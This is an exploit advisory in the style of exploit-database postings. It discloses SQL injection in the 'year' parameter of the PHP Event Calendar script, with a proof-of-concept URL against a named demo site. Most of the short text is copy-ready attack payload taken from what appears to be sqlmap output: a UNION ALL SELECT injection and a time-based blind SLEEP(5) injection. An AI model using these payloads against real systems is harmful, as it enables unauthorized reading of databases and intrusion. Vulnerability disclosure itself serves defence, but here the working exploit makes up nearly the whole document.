# Exploit Title: PHP Event Calendar / SQL Injection Vulnerability#
Date: 14/04/2014# Author: Daniel Godoy# Author Mail:
danielgodoy[at]GobiernoFederal[dot]com# Author Web:
www.delincuentedigital.com.ar# Software: PHP Event Calendar# Software
Link: http://codecanyon.net/item/php-event-calendar/47723# Tested on:
Linux
[Comment]Greetz: Ariel Orellana www.remoteexecution.net
www.remoteexcution.com.ar [PoC] http://envato.jigowatt.co.uk/code/calendar/day_view.php?day=23&month=4&year=2014
Place: GETParameter: year    Type: UNION query    Title: MySQL
UNION query (NULL) - 1 to 10 columns    Payload:
day=23&month=4&year=2014' UNION ALL SELECT NULL, NULL, NULL, NULL,
NULL, NULL,
CONCAT(CHAR(58,100,120,121,58),IFNULL(CAST(CHAR(113,68,117,66,112,104,104,66,114,109)
AS CHAR),CHAR(32)),CHAR(58,115,104,115,58)), NULL# AND 'JNPR'='JNPR
    Type: AND/OR time-based blind    Title: MySQL > 5.0.11 AND
time-based blind    Payload: day=23&month=4&year=2014' AND SLEEP(5)
AND 'PIGb'='PIGb

-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com